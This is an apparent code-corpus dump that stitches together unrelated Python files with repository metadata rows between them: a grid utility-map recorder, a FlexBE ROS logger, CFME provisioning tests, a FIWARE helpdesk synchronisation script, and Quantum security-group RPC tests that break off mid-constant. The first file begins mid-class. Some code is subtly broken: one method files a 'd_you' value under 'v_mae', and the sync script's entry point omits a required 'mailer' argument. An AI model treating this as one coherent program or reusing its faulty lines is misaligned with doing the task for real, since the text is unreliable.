def __init__(self, num_grid_x, num_grid_y):
self.num_grid_x = num_grid_x
self.num_grid_y = num_grid_y
self.utilities = defaultdict(list)
self.factors = defaultdict(list)
self.ra_values = defaultdict(list)
def add(self, f_ma_me, f_ma_you, f_mv_me, f_mv_you,
f_mw_me, f_mw_you, f_ra, f_rd, f_rv,
f_o_me, f_o_you, f_s_me, f_s_you,
o_me_dis, o_you_dis, s_me_theta, s_you_theta, rv_vec,
rd_dis, ra_theta, mv_me_vec, mv_you_vec, ma_me_gal,
ma_you_gal, mw_me_rad, mw_you_rad):
self.utilities["f_rv"].append(f_rv)
self.utilities["f_rd"].append(f_rd)
self.utilities["f_ra"].append(f_ra)
self.utilities["f_mv_me"].append(f_mv_me)
self.utilities["f_mv_you"].append(f_mv_you)
self.utilities["f_ma_me"].append(f_ma_me)
self.utilities["f_ma_you"].append(f_ma_you)
self.utilities["f_mw_me"].append(f_mw_me)
self.utilities["f_mw_you"].append(f_mw_you)
self.utilities["f_o_me"].append(f_o_me)
self.utilities["f_o_you"].append(f_o_you)
self.utilities["f_s_me"].append(f_s_me)
self.utilities["f_s_you"].append(f_s_you)
self.factors["rv_vec"].append(rv_vec)
self.factors["rd_dis"].append(rd_dis)
self.factors["ra_theta"].append(ra_theta)
self.factors["mv_me_vec"].append(mv_me_vec)
self.factors["mv_you_vec"].append(mv_you_vec)
self.factors["ma_me_gal"].append(ma_me_gal)
self.factors["ma_you_gal"].append(ma_you_gal)
self.factors["mw_me_rad"].append(mw_me_rad)
self.factors["mw_you_rad"].append(mw_you_rad)
self.factors["o_me_dis"].append(o_me_dis)
self.factors["o_you_dis"].append(o_you_dis)
self.factors["s_me_theta"].append(s_me_theta)
self.factors["s_you_theta"].append(s_you_theta)
def add_ra_values(self, p_me, p_you, d_you, v_yoko,
theta_mae, theta_yoko, theta, r_a):
self.ra_values["p_me"].append(p_me)
self.ra_values["p_you"].append(p_you)
self.ra_values["v_mae"].append(d_you)
self.ra_values["v_yoko"].append(v_yoko)
self.ra_values["theta_mae"].append(theta_mae)
self.ra_values["theta_yoko"].append(theta_yoko)
self.ra_values["theta"].append(theta)
self.ra_values["r_a"].append(r_a)
def get_utility_maps(self):
maps = {}
for name, lst in self.utilities.items():
assert not np.any(np.isnan(lst)), "{}, {}".format(name, lst)
lst = np.array(lst)
num_step = len(lst) // (self.num_grid_y * self.num_grid_x *
self.num_grid_y * self.num_grid_x)
maps[name] = lst.reshape(
num_step, self.num_grid_y, self.num_grid_x,
self.num_grid_y, self.num_grid_x)
return maps
def get_factors_maps(self):
theta_maps = {}
for name, lst in self.factors.items():
assert not np.any(np.isnan(lst)), "{}, {}".format(name, lst)
lst = np.array(lst)
num_step = len(lst) // (self.num_grid_y * self.num_grid_x *
self.num_grid_y * self.num_grid_x)
theta_maps[name] = lst.reshape(
num_step, self.num_grid_y, self.num_grid_x,
self.num_grid_y, self.num_grid_x)
return theta_maps
def get_values_maps(self):
values_maps = {}
for name, lst in self.ra_values.items():
assert not np.any(np.isnan(lst)), "{}, {}".format(name, lst)
lst = np.array(lst)
num_step = len(lst) // (self.num_grid_y * self.num_grid_x *
self.num_grid_y * self.num_grid_x)
size = lst.shape[-1]
if lst.ndim > 1:
values_maps[name] = lst.reshape(
num_step, self.num_grid_y, self.num_grid_x,
self.num_grid_y, self.num_grid_x, size)
else:
values_maps[name] = lst.reshape(
num_step, self.num_grid_y, self.num_grid_x,
self.num_grid_y, self.num_grid_x, 1)
return values_maps
| mit | -4,301,349,524,016,367,000 | 42.673469 | 72 | 0.542757 | false | 2.943604 | false | false | false |
team-vigir/flexbe_behavior_engine | flexbe_core/src/flexbe_core/logger.py | 1 | 2138 | #!/usr/bin/env python
import rospy
from flexbe_msgs.msg import BehaviorLog
class Logger(object):
'''
Realizes behavior-specific logging.
'''
REPORT_INFO = BehaviorLog.INFO
REPORT_WARN = BehaviorLog.WARN
REPORT_HINT = BehaviorLog.HINT
REPORT_ERROR = BehaviorLog.ERROR
REPORT_DEBUG = BehaviorLog.DEBUG
LOGGING_TOPIC = 'flexbe/log'
_pub = None
@staticmethod
def initialize():
Logger._pub = rospy.Publisher(Logger.LOGGING_TOPIC, BehaviorLog, queue_size=100)
@staticmethod
def log(text, severity):
if Logger._pub is None:
Logger.initialize()
# send message with logged text
msg = BehaviorLog()
msg.text = str(text)
msg.status_code = severity
Logger._pub.publish(msg)
# also log locally
Logger.local(text, severity)
@staticmethod
def local(text, severity):
if severity == Logger.REPORT_INFO:
rospy.loginfo(text)
elif severity == Logger.REPORT_WARN:
rospy.logwarn(text)
elif severity == Logger.REPORT_HINT:
rospy.loginfo('\033[94mBehavior Hint: %s\033[0m', text)
elif severity == Logger.REPORT_ERROR:
rospy.logerr(text)
elif severity == Logger.REPORT_DEBUG:
rospy.logdebug(text)
else:
rospy.logdebug(text + ' (unknown log level %s)' % str(severity))
@staticmethod
def logdebug(text, *args):
Logger.log(text % args, Logger.REPORT_DEBUG)
@staticmethod
def loginfo(text, *args):
Logger.log(text % args, Logger.REPORT_INFO)
@staticmethod
def logwarn(text, *args):
Logger.log(text % args, Logger.REPORT_WARN)
@staticmethod
def loghint(text, *args):
Logger.log(text % args, Logger.REPORT_HINT)
@staticmethod
def logerr(text, *args):
Logger.log(text % args, Logger.REPORT_ERROR)
@staticmethod
def localdebug(text, *args):
Logger.local(text % args, Logger.REPORT_DEBUG)
@staticmethod
def localinfo(text, *args):
Logger.local(text % args, Logger.REPORT_INFO)
| bsd-3-clause | -6,835,429,230,349,826,000 | 26.410256 | 88 | 0.61927 | false | 3.831541 | false | false | false |
jkandasa/integration_tests | cfme/tests/services/test_operations.py | 1 | 4462 | # -*- coding: utf-8 -*-
"""Tests checking for link access from outside."""
import fauxfactory
import pytest
from widgetastic.utils import partial_match
from cfme import test_requirements
from cfme.infrastructure.provider import InfraProvider
from cfme.infrastructure.virtual_machines import Vm
from cfme.fixtures import pytest_selenium as sel
from cfme.utils.appliance.implementations.ui import navigate_to
from cfme.utils.browser import browser
from cfme.utils.wait import wait_for
from fixtures.provider import setup_one_by_class_or_skip
from fixtures.pytest_store import store
pytestmark = [
pytest.mark.meta(server_roles="-automate"), # To prevent the provisioning itself.
test_requirements.service
]
@pytest.fixture(scope='module')
def a_provider(request):
return setup_one_by_class_or_skip(request, InfraProvider)
@pytest.fixture(scope="module")
def provider_data(a_provider):
return a_provider.get_yaml_data()
@pytest.fixture(scope="module")
def provisioning(provider_data):
return provider_data.get("provisioning", {})
@pytest.fixture(scope="module")
def template_name(provisioning):
return provisioning.get("template")
@pytest.fixture(scope="module")
def vm_name():
return fauxfactory.gen_alphanumeric(length=16)
@pytest.yield_fixture(scope="module")
def generated_request(appliance,
a_provider, provider_data, provisioning, template_name, vm_name):
"""Creates a provision request, that is not automatically approved, and returns the search data.
After finishing the test, request should be automatically deleted.
Slightly modified code from :py:module:`cfme.tests.infrastructure.test_provisioning`
"""
first_name = fauxfactory.gen_alphanumeric()
last_name = fauxfactory.gen_alphanumeric()
notes = fauxfactory.gen_alphanumeric()
e_mail = "{}@{}.test".format(first_name, last_name)
host, datastore = map(provisioning.get, ('host', 'datastore'))
vm = Vm(name=vm_name, provider=a_provider, template_name=template_name)
view = navigate_to(vm, 'Provision')
provisioning_data = {
'request': {
'email': e_mail,
'first_name': first_name,
'last_name': last_name,
'notes': notes},
'catalog': {
'vm_name': vm_name,
'num_vms': '10'},
'environment':
{'host_name': {'name': host},
'datastore_name': {'name': datastore}},
}
# Same thing, different names. :\
if provider_data["type"] == 'rhevm':
provisioning_data['catalog']['provision_type'] = 'Native Clone'
elif provider_data["type"] == 'virtualcenter':
provisioning_data['catalog']['provision_type'] = 'VMware'
try:
provisioning_data['network'] = {'vlan': partial_match(provisioning['vlan'])}
except KeyError:
# provisioning['vlan'] is required for rhevm provisioning
if provider_data["type"] == 'rhevm':
raise pytest.fail('rhevm requires a vlan value in provisioning info')
view.form.fill_with(provisioning_data, on_change=view.form.submit_button)
request_cells = {
"Description": "Provision from [{}] to [{}###]".format(template_name, vm_name),
}
provision_request = appliance.collections.requests.instantiate(cells=request_cells)
yield provision_request
browser().get(store.base_url)
appliance.server.login_admin()
provision_request.remove_request()
@pytest.mark.tier(3)
def test_services_request_direct_url(generated_request):
"""Go to the request page, save the url and try to access it directly."""
assert navigate_to(generated_request, 'Details'), "could not find the request!"
request_url = sel.current_url()
sel.get(sel.base_url()) # I need to flip it with something different here
sel.get(request_url) # Ok, direct access now.
wait_for(
lambda: sel.is_displayed("//body[contains(@onload, 'miqOnLoad')]"),
num_sec=20,
message="wait for a CFME page appear",
delay=0.5
)
@pytest.mark.tier(3)
def test_copy_request(request, generated_request, vm_name, template_name):
"""Check if request gets properly copied."""
modifications = {'catalog': {'vm_name': fauxfactory.gen_alphanumeric(length=16)}}
new_request = generated_request.copy_request(values=modifications)
request.addfinalizer(new_request.remove_request)
assert navigate_to(new_request, 'Details')
| gpl-2.0 | 5,842,273,452,863,127,000 | 33.589147 | 100 | 0.680636 | false | 3.774958 | true | false | false |
flopezag/fiware-management-scripts | HelpDesk/synchronization.py | 1 | 4487 | #!/usr/bin/env <PATH_HELPDESK>/env/bin/python
# -*- coding: utf-8 -*-
##
# Copyright 2017 FIWARE Foundation, e.V.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
##
from HelpDesk.desks.helpdeskImporter import HelpDeskImporter
from HelpDesk.desks.helpdesk import HelpDesk
from HelpDesk.platforms.servers import AskBot
from logging import error, exception, info, debug
from logging import _nameToLevel as nameToLevel
from argparse import ArgumentParser
from sys import exc_info
from Common.logging_conf import LoggingConf
from Config.settings import JIRA_URL
__author__ = 'Fernando López'
class AskbotSync(LoggingConf):
def __init__(self, loglevel):
super(AskbotSync, self).__init__(loglevel=loglevel, log_file='askbot.log')
info('\n\n---- Askbot Synchronization----\n')
try:
self.helpdesk = HelpDeskImporter()
self.helpdesk.get_monitors()
except Exception as e:
error(e)
error('No connection to JIRA https://{}'.format(JIRA_URL))
error("Unexpected error: {}".format(exc_info()[0]))
exit()
self.askbot = AskBot()
def process(self):
def get_status(q):
if q.monitor:
result = q.monitor.fields.status
else:
result = 'None'
return result
try:
self.askbot.get_questions()
except Exception as e:
error(e)
error('Failed to get questions from server')
finally:
self.askbot.match(self.helpdesk.monitors)
for question in self.askbot.questions:
debug('{}, monitor={}, monitor status={}, question url={}'
.format(question, question.monitor, get_status(q=question), question.url))
self.helpdesk.update_with(self.askbot.questions)
info('helpdesk: # issues created = {}'.format(self.helpdesk.n_monitors))
info('helpdesk: # issues transitions = {}'.format(self.helpdesk.n_transitions))
info('askbot questions = {}'.format(len(self.askbot.questions)))
self.close()
class HelpDeskCaretaker(LoggingConf):
def __init__(self, loglevel, mailer):
super(HelpDeskCaretaker, self).__init__(loglevel=loglevel, log_file='mainhelpdesk.log')
info('\n\n---- HELP-DESK Caretakers----\n')
try:
self.helpdesk = HelpDesk(loglevel=loglevel, mailer=mailer)
except Exception as e:
error(e)
exception("Unexpected error: {}".format(exc_info()[0]))
exit()
def process(self):
self.helpdesk.channel_requests()
self.helpdesk.assign_requests()
self.helpdesk.remove_spam()
self.helpdesk.naming()
info('main helpdesk: # issues assigned = {}'.format(self.helpdesk.n_assignments))
info('main helpdesk: # issues channeled = {}'.format(self.helpdesk.n_channeled))
info('main helpdesk: # issues deleted = {}'.format(self.helpdesk.n_removed))
info('main helpdesk: # issues renamed = {}'.format(self.helpdesk.n_renamed))
self.close()
if __name__ == "__main__":
parser = ArgumentParser(prog='Askbot', description='Synchronising scripts')
parser.add_argument('-l', '--log',
default='INFO',
help='The logging level to be used.')
args = parser.parse_args()
loglevel = None
try:
loglevel = nameToLevel[args.log.upper()]
except Exception as e1:
print('Invalid log level: {}'.format(args.log))
print('Please use one of the following values:')
print(' * CRITICAL')
print(' * ERROR')
print(' * WARNING')
print(' * INFO')
print(' * DEBUG')
print(' * NOTSET')
exit()
askbotSync = AskbotSync(loglevel=loglevel)
askbotSync.process()
helpdeskCaretaker = HelpDeskCaretaker(loglevel=loglevel)
helpdeskCaretaker.process()
| apache-2.0 | -5,162,619,168,462,307,000 | 32.984848 | 95 | 0.625279 | false | 3.935088 | false | false | false |
rossella/neutron | quantum/tests/unit/test_security_groups_rpc.py | 1 | 52820 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
#
# Copyright 2012, Nachi Ueno, NTT MCL, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from contextlib import nested
import mock
from mock import call
import unittest2 as unittest
import mox
from quantum.agent import firewall as firewall_base
from quantum.agent.linux import iptables_manager
from quantum.agent import rpc as agent_rpc
from quantum.agent import securitygroups_rpc as sg_rpc
from quantum import context
from quantum.db import securitygroups_rpc_base as sg_db_rpc
from quantum.extensions import securitygroup as ext_sg
from quantum.openstack.common import cfg
from quantum.openstack.common.rpc import proxy
from quantum.tests.unit import test_extension_security_group as test_sg
from quantum.tests.unit import test_iptables_firewall as test_fw
class FakeSGCallback(sg_db_rpc.SecurityGroupServerRpcCallbackMixin):
def get_port_from_device(self, device):
device = self.devices.get(device)
if device:
device['security_group_rules'] = []
device['security_group_source_groups'] = []
device['fixed_ips'] = [ip['ip_address']
for ip in device['fixed_ips']]
return device
class SGServerRpcCallBackMixinTestCase(test_sg.SecurityGroupDBTestCase):
def setUp(self):
super(SGServerRpcCallBackMixinTestCase, self).setUp()
self.rpc = FakeSGCallback()
def test_security_group_rules_for_devices_ipv4_ingress(self):
fake_prefix = test_fw.FAKE_PREFIX['IPv4']
with self.network() as n:
with nested(self.subnet(n),
self.security_group()) as (subnet_v4,
sg1):
sg1_id = sg1['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'ingress', 'tcp', '22',
'22')
rule2 = self._build_security_group_rule(
sg1_id,
'ingress', 'tcp', '23',
'23', fake_prefix)
rules = {
'security_group_rules': [rule1['security_group_rule'],
rule2['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
security_groups=[sg1_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': 'ingress',
'protocol': 'tcp', 'ethertype': 'IPv4',
'port_range_max': 22,
'security_group_id': sg1_id,
'port_range_min': 22},
{'direction': 'ingress', 'protocol': 'tcp',
'ethertype': 'IPv4',
'port_range_max': 23, 'security_group_id': sg1_id,
'port_range_min': 23,
'source_ip_prefix': fake_prefix},
{'ethertype': 'IPv4', 'direction': 'egress'},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
def test_security_group_rules_for_devices_ipv4_egress(self):
fake_prefix = test_fw.FAKE_PREFIX['IPv4']
with self.network() as n:
with nested(self.subnet(n),
self.security_group()) as (subnet_v4,
sg1):
sg1_id = sg1['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'egress', 'tcp', '22',
'22')
rule2 = self._build_security_group_rule(
sg1_id,
'egress', 'udp', '23',
'23', fake_prefix)
rules = {
'security_group_rules': [rule1['security_group_rule'],
rule2['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
security_groups=[sg1_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': 'egress',
'protocol': 'tcp', 'ethertype': 'IPv4',
'port_range_max': 22,
'security_group_id': sg1_id,
'port_range_min': 22},
{'direction': 'egress', 'protocol': 'udp',
'ethertype': 'IPv4',
'port_range_max': 23, 'security_group_id': sg1_id,
'port_range_min': 23,
'dest_ip_prefix': fake_prefix},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
def test_security_group_rules_for_devices_ipv4_source_group(self):
with self.network() as n:
with nested(self.subnet(n),
self.security_group(),
self.security_group()) as (subnet_v4,
sg1,
sg2):
sg1_id = sg1['security_group']['id']
sg2_id = sg2['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'ingress', 'tcp', '24',
'25', source_group_id=sg2['security_group']['id'])
rules = {
'security_group_rules': [rule1['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
security_groups=[sg1_id,
sg2_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
res2 = self._create_port(
self.fmt, n['network']['id'],
security_groups=[sg2_id])
ports_rest2 = self.deserialize(self.fmt, res2)
port_id2 = ports_rest2['port']['id']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': u'ingress',
'source_ip_prefix': u'10.0.0.3/32',
'protocol': u'tcp', 'ethertype': u'IPv4',
'port_range_max': 25, 'port_range_min': 24,
'source_group_id': sg2_id,
'security_group_id': sg1_id},
{'ethertype': 'IPv4', 'direction': 'egress'},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
self._delete('ports', port_id2)
def test_security_group_rules_for_devices_ipv6_ingress(self):
fake_prefix = test_fw.FAKE_PREFIX['IPv6']
with self.network() as n:
with nested(self.subnet(n,
cidr=fake_prefix,
ip_version=6),
self.security_group()) as (subnet_v6,
sg1):
sg1_id = sg1['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'ingress', 'tcp', '22',
'22',
ethertype='IPv6')
rule2 = self._build_security_group_rule(
sg1_id,
'ingress', 'udp', '23',
'23', fake_prefix,
ethertype='IPv6')
rules = {
'security_group_rules': [rule1['security_group_rule'],
rule2['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
fixed_ips=[{'subnet_id': subnet_v6['subnet']['id']}],
security_groups=[sg1_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': 'ingress',
'protocol': 'tcp', 'ethertype': 'IPv6',
'port_range_max': 22,
'security_group_id': sg1_id,
'port_range_min': 22},
{'direction': 'ingress', 'protocol': 'udp',
'ethertype': 'IPv6',
'port_range_max': 23, 'security_group_id': sg1_id,
'port_range_min': 23,
'source_ip_prefix': fake_prefix},
{'ethertype': 'IPv6', 'direction': 'egress'},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
def test_security_group_rules_for_devices_ipv6_egress(self):
fake_prefix = test_fw.FAKE_PREFIX['IPv6']
with self.network() as n:
with nested(self.subnet(n,
cidr=fake_prefix,
ip_version=6),
self.security_group()) as (subnet_v6,
sg1):
sg1_id = sg1['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'egress', 'tcp', '22',
'22',
ethertype='IPv6')
rule2 = self._build_security_group_rule(
sg1_id,
'egress', 'udp', '23',
'23', fake_prefix,
ethertype='IPv6')
rules = {
'security_group_rules': [rule1['security_group_rule'],
rule2['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
fixed_ips=[{'subnet_id': subnet_v6['subnet']['id']}],
security_groups=[sg1_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': 'egress',
'protocol': 'tcp', 'ethertype': 'IPv6',
'port_range_max': 22,
'security_group_id': sg1_id,
'port_range_min': 22},
{'direction': 'egress', 'protocol': 'udp',
'ethertype': 'IPv6',
'port_range_max': 23, 'security_group_id': sg1_id,
'port_range_min': 23,
'dest_ip_prefix': fake_prefix},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
def test_security_group_rules_for_devices_ipv6_source_group(self):
fake_prefix = test_fw.FAKE_PREFIX['IPv6']
with self.network() as n:
with nested(self.subnet(n,
cidr=fake_prefix,
ip_version=6),
self.security_group(),
self.security_group()) as (subnet_v6,
sg1,
sg2):
sg1_id = sg1['security_group']['id']
sg2_id = sg2['security_group']['id']
rule1 = self._build_security_group_rule(
sg1_id,
'ingress', 'tcp', '24',
'25',
ethertype='IPv6',
source_group_id=sg2['security_group']['id'])
rules = {
'security_group_rules': [rule1['security_group_rule']]}
res = self._create_security_group_rule(self.fmt, rules)
self.deserialize(self.fmt, res)
self.assertEquals(res.status_int, 201)
res1 = self._create_port(
self.fmt, n['network']['id'],
fixed_ips=[{'subnet_id': subnet_v6['subnet']['id']}],
security_groups=[sg1_id,
sg2_id])
ports_rest1 = self.deserialize(self.fmt, res1)
port_id1 = ports_rest1['port']['id']
self.rpc.devices = {port_id1: ports_rest1['port']}
devices = [port_id1, 'no_exist_device']
res2 = self._create_port(
self.fmt, n['network']['id'],
fixed_ips=[{'subnet_id': subnet_v6['subnet']['id']}],
security_groups=[sg2_id])
ports_rest2 = self.deserialize(self.fmt, res2)
port_id2 = ports_rest2['port']['id']
ctx = context.get_admin_context()
ports_rpc = self.rpc.security_group_rules_for_devices(
ctx, devices=devices)
port_rpc = ports_rpc[port_id1]
expected = [{'direction': 'ingress',
'source_ip_prefix': 'fe80::3/128',
'protocol': 'tcp', 'ethertype': 'IPv6',
'port_range_max': 25, 'port_range_min': 24,
'source_group_id': sg2_id,
'security_group_id': sg1_id},
{'ethertype': 'IPv6', 'direction': 'egress'},
]
self.assertEquals(port_rpc['security_group_rules'],
expected)
self._delete('ports', port_id1)
self._delete('ports', port_id2)
class SGServerRpcCallBackMixinTestCaseXML(SGServerRpcCallBackMixinTestCase):
fmt = 'xml'
class SGAgentRpcCallBackMixinTestCase(unittest.TestCase):
def setUp(self):
self.rpc = sg_rpc.SecurityGroupAgentRpcCallbackMixin()
self.rpc.sg_agent = mock.Mock()
def test_security_groups_rule_updated(self):
self.rpc.security_groups_rule_updated(None,
security_groups=['fake_sgid'])
self.rpc.sg_agent.assert_has_calls(
[call.security_groups_rule_updated(['fake_sgid'])])
def test_security_groups_member_updated(self):
self.rpc.security_groups_member_updated(None,
security_groups=['fake_sgid'])
self.rpc.sg_agent.assert_has_calls(
[call.security_groups_member_updated(['fake_sgid'])])
def test_security_groups_provider_updated(self):
self.rpc.security_groups_provider_updated(None)
self.rpc.sg_agent.assert_has_calls(
[call.security_groups_provider_updated()])
class SecurityGroupAgentRpcTestCase(unittest.TestCase):
def setUp(self):
self.agent = sg_rpc.SecurityGroupAgentRpcMixin()
self.agent.context = None
self.addCleanup(mock.patch.stopall)
mock.patch('quantum.agent.linux.iptables_manager').start()
self.agent.root_helper = 'sudo'
self.agent.init_firewall()
self.firewall = mock.Mock()
firewall_object = firewall_base.FirewallDriver()
self.firewall.defer_apply.side_effect = firewall_object.defer_apply
self.agent.firewall = self.firewall
rpc = mock.Mock()
self.agent.plugin_rpc = rpc
self.fake_device = {'device': 'fake_device',
'security_groups': ['fake_sgid1', 'fake_sgid2'],
'security_group_source_groups': ['fake_sgid2'],
'security_group_rules': [{'security_group_id':
'fake_sgid1',
'source_group_id':
'fake_sgid2'}]}
fake_devices = {'fake_device': self.fake_device}
self.firewall.ports = fake_devices
rpc.security_group_rules_for_devices.return_value = fake_devices
def test_prepare_and_remove_devices_filter(self):
self.agent.prepare_devices_filter(['fake_device'])
self.agent.remove_devices_filter(['fake_device'])
# ignore device which is not filtered
self.firewall.assert_has_calls([call.defer_apply(),
call.prepare_port_filter(
self.fake_device),
call.defer_apply(),
call.remove_port_filter(
self.fake_device),
])
def test_security_groups_rule_updated(self):
self.agent.refresh_firewall = mock.Mock()
self.agent.prepare_devices_filter(['fake_port_id'])
self.agent.security_groups_rule_updated(['fake_sgid1', 'fake_sgid3'])
self.agent.refresh_firewall.assert_has_calls(
[call.refresh_firewall()])
def test_security_groups_rule_not_updated(self):
self.agent.refresh_firewall = mock.Mock()
self.agent.prepare_devices_filter(['fake_port_id'])
self.agent.security_groups_rule_updated(['fake_sgid3', 'fake_sgid4'])
self.agent.refresh_firewall.assert_has_calls([])
def test_security_groups_member_updated(self):
self.agent.refresh_firewall = mock.Mock()
self.agent.prepare_devices_filter(['fake_port_id'])
self.agent.security_groups_member_updated(['fake_sgid2', 'fake_sgid3'])
self.agent.refresh_firewall.assert_has_calls(
[call.refresh_firewall()])
def test_security_groups_member_not_updated(self):
self.agent.refresh_firewall = mock.Mock()
self.agent.prepare_devices_filter(['fake_port_id'])
self.agent.security_groups_member_updated(['fake_sgid3', 'fake_sgid4'])
self.agent.refresh_firewall.assert_has_calls([])
def test_security_groups_provider_updated(self):
self.agent.refresh_firewall = mock.Mock()
self.agent.security_groups_provider_updated()
self.agent.refresh_firewall.assert_has_calls(
[call.refresh_firewall()])
def test_refresh_firewall(self):
self.agent.prepare_devices_filter(['fake_port_id'])
self.agent.refresh_firewall()
calls = [call.defer_apply(),
call.prepare_port_filter(self.fake_device),
call.defer_apply(),
call.update_port_filter(self.fake_device)]
self.firewall.assert_has_calls(calls)
class FakeSGRpcApi(agent_rpc.PluginApi,
sg_rpc.SecurityGroupServerRpcApiMixin):
pass
class SecurityGroupServerRpcApiTestCase(unittest.TestCase):
def setUp(self):
self.rpc = FakeSGRpcApi('fake_topic')
self.rpc.call = mock.Mock()
def test_security_group_rules_for_devices(self):
self.rpc.security_group_rules_for_devices(None, ['fake_device'])
self.rpc.call.assert_has_calls(
[call(None,
{'args':
{'devices': ['fake_device']},
'method':
'security_group_rules_for_devices'},
version=sg_rpc.SG_RPC_VERSION,
topic='fake_topic')])
class FakeSGNotifierAPI(proxy.RpcProxy,
sg_rpc.SecurityGroupAgentRpcApiMixin):
pass
class SecurityGroupAgentRpcApiTestCase(unittest.TestCase):
def setUp(self):
self.notifier = FakeSGNotifierAPI(topic='fake',
default_version='1.0')
self.notifier.fanout_cast = mock.Mock()
def test_security_groups_rule_updated(self):
self.notifier.security_groups_rule_updated(
None, security_groups=['fake_sgid'])
self.notifier.fanout_cast.assert_has_calls(
[call(None,
{'args':
{'security_groups': ['fake_sgid']},
'method': 'security_groups_rule_updated'},
version=sg_rpc.SG_RPC_VERSION,
topic='fake-security_group-update')])
def test_security_groups_member_updated(self):
self.notifier.security_groups_member_updated(
None, security_groups=['fake_sgid'])
self.notifier.fanout_cast.assert_has_calls(
[call(None,
{'args':
{'security_groups': ['fake_sgid']},
'method': 'security_groups_member_updated'},
version=sg_rpc.SG_RPC_VERSION,
topic='fake-security_group-update')])
def test_security_groups_rule_not_updated(self):
self.notifier.security_groups_rule_updated(
None, security_groups=[])
self.assertEquals(False, self.notifier.fanout_cast.called)
def test_security_groups_member_not_updated(self):
self.notifier.security_groups_member_updated(
None, security_groups=[])
self.assertEquals(False, self.notifier.fanout_cast.called)
#Note(nati) bn -> binary_name
# id -> device_id
PHYSDEV_RULE = '-m physdev --physdev-is-bridged'
IPTABLES_ARG = {'bn': iptables_manager.binary_name,
'physdev': PHYSDEV_RULE}
CHAINS_NAT = 'OUTPUT|POSTROUTING|PREROUTING|float-snat|snat'
IPTABLES_ARG['chains'] = CHAINS_NAT
IPTABLES_NAT = """:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:%(bn)s-(%(chains)s) - [0:0]
:quantum-postrouting-bottom - [0:0]
-A PREROUTING -j %(bn)s-PREROUTING
-A OUTPUT -j %(bn)s-OUTPUT
-A POSTROUTING -j %(bn)s-POSTROUTING
-A POSTROUTING -j quantum-postrouting-bottom
-A quantum-postrouting-bottom -j %(bn)s-snat
-A %(bn)s-snat -j %(bn)s-float-snat
""" % IPTABLES_ARG
CHAINS_EMPTY = 'FORWARD|INPUT|OUTPUT|local|sg-chain|sg-fallback'
